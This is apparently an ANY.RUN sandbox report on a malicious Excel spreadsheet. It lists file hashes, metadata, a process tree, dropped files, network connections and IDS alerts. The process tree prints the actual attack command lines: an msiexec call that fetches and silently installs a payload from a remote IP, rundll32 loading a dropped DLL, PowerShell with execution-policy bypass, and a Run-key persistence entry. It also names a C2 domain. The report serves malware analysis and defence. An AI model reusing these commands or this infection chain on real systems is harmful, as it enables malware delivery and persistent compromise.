File name: | 19d278bfbe851f8d7599e9e682ccc0f77619b905.xls |
Full analysis: | https://app.any.run/tasks/60a117f4-a55c-430f-a851-7150674788b2 |
Verdict: | Malicious activity |
Analysis date: | March 21, 2019, 17:15:01 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: Microsoft Office, Last Saved By: 1, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Dec 19 10:42:12 2018, Last Saved Time/Date: Thu Mar 21 06:44:15 2019, Security: 0 |
MD5: | E5140EB52558797DBE9FAAB58C78C493 |
SHA1: | 19D278BFBE851F8D7599E9E682CCC0F77619B905 |
SHA256: | 63522E00181E6B8D9AE8BFD51F7DF8F8EBD0F42323E22047269DF9C7A71C9B6D |
SSDEEP: | 1536:7Kpb8rGYrMPelwhKmFV5xtezEsgrdg8j/4q09wsRnyKinolB0IdludN7VaLyIc+V:7Kpb8rGYrMPelwhKmFV5xtezEsgrdgUI |
.xls | | | Microsoft Excel sheet (78.9) |
---|
Author: | Microsoft Office |
---|---|
LastModifiedBy: | 1 |
Software: | Microsoft Excel |
CreateDate: | 2018:12:19 10:42:12 |
ModifyDate: | 2019:03:21 06:44:15 |
Security: | None |
CodePage: | Windows Cyrillic |
Company: | Microsoft Corporation |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: |
|
HeadingPairs: |
|
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
688 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
1468 | msiexec.exe RETURN=185 /i http://169.239.128.104/alg /q ksw='%TEMP%' | C:\Windows\system32\msiexec.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
3240 | C:\Windows\system32\msiexec.exe /V | C:\Windows\system32\msiexec.exe | services.exe | |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows® installer Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
4060 | "C:\Windows\Installer\MSIA041.tmp" | C:\Windows\Installer\MSIA041.tmp | msiexec.exe | |
User: admin Company: hepsu burda Integrity Level: MEDIUM Description: hepsu burda Application Version: 1.0.2.1 | ||||
2724 | "C:\Users\admin\AppData\Local\Temp\nsbA179.tmp\nsA189.tmp" "cmd.exe" /c rundll32.exe C:\Users\admin\AppData\Local\Temp\xmlparse.dll, sega | C:\Users\admin\AppData\Local\Temp\nsbA179.tmp\nsA189.tmp | — | MSIA041.tmp |
User: admin Integrity Level: MEDIUM | ||||
3056 | "cmd.exe" /c rundll32.exe C:\Users\admin\AppData\Local\Temp\xmlparse.dll, sega | C:\Windows\system32\cmd.exe | — | nsA189.tmp |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3464 | rundll32.exe C:\Users\admin\AppData\Local\Temp\xmlparse.dll, sega | C:\Windows\system32\rundll32.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1456 | cmd.exe /C powershell -nop -ep bypass -f %temp%\enu.ps1 | C:\Windows\system32\cmd.exe | — | rundll32.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2164 | powershell -nop -ep bypass -f C:\Users\admin\AppData\Local\Temp\enu.ps1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2728 | cmd.exe /C reg add "HKCU\SOFTWARE\microsoft\windows\currentversion\run" /v ServiceDLL /t REG_EXPAND_SZ /d "rundll32 %temp%\xmlparse.dll, sega" /f | C:\Windows\system32\cmd.exe | — | rundll32.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
PID | Process | Filename | Type | |
---|---|---|---|---|
688 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR8AF1.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3240 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\~DF4FC4E56F7B50CECE.TMP | — | |
MD5:— | SHA256:— | |||
2164 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EXN7AX5EA6LHRYO9KBY6.temp | — | |
MD5:— | SHA256:— | |||
3240 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\History\History.IE5\index.dat | dat | |
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862 | SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A | |||
3240 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\index.dat | dat | |
MD5:8222CA92620FFB9E327874DE04FD8D85 | SHA256:7DB8F5F48713B41A2DEF0B6A086178365527D203325D1AC84D6437755859DB83 | |||
4060 | MSIA041.tmp | C:\Users\admin\AppData\Local\Temp\xmlparse.dll | executable | |
MD5:6675C63A2534FD65B3B2DA751F2B393F | SHA256:BEE3B2710F7E874CE05E6B8B45CC20E021B9C00EE337238598E71E7315128333 | |||
3240 | msiexec.exe | C:\Windows\Installer\MSI9774.tmp | executable | |
MD5:D4C11BDA021113CA4604D80896B2A492 | SHA256:AE2B1B1F7265386EDBBF2617084F277CDB9BC5AC34BD9AAC00CBC77A6BDCD829 | |||
4060 | MSIA041.tmp | C:\Users\admin\AppData\Local\Temp\nsbA179.tmp\nsA189.tmp | executable | |
MD5:E2347A65B30CCC5B2C4230DAAEEFB897 | SHA256:79FD3041AB85E378839D2E3CF155FC91A2D541304D209F5D1D57AC7D791190EC | |||
3240 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\F2U782LG\desktop.ini | ini | |
MD5:4A3DEB274BB5F0212C2419D3D8D08612 | SHA256:2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38 | |||
3240 | msiexec.exe | C:\Windows\Installer\MSI9F55.tmp | binary | |
MD5:27EA1D34A855751F367D98CD10835CF5 | SHA256:CDA0177A5E0FC56D8FCDCB139F054D539D0E36426D08385EFBDB087B0FEC1E64 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3240 | msiexec.exe | GET | 200 | 169.239.128.104:80 | http://169.239.128.104/alg | ZA | executable | 396 Kb | suspicious |
3464 | rundll32.exe | POST | 200 | 179.43.156.37:80 | http://cdnavupdate.icu/jquery/jquery.php | CH | text | 140 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3464 | rundll32.exe | 179.43.156.37:80 | cdnavupdate.icu | Private Layer INC | CH | suspicious |
3240 | msiexec.exe | 169.239.128.104:80 | — | Zappie Host LLC | ZA | suspicious |
Domain | IP | Reputation |
---|---|---|
cdnavupdate.icu |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3240 | msiexec.exe | Misc activity | SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file |
3240 | msiexec.exe | Potential Corporate Privacy Violation | POLICY [PTsecurity] Executable application_x-msi Download |
— | — | Potentially Bad Traffic | ET INFO DNS Query for Suspicious .icu Domain |
3464 | rundll32.exe | Potentially Bad Traffic | ET INFO HTTP POST Request to Suspicious *.icu domain |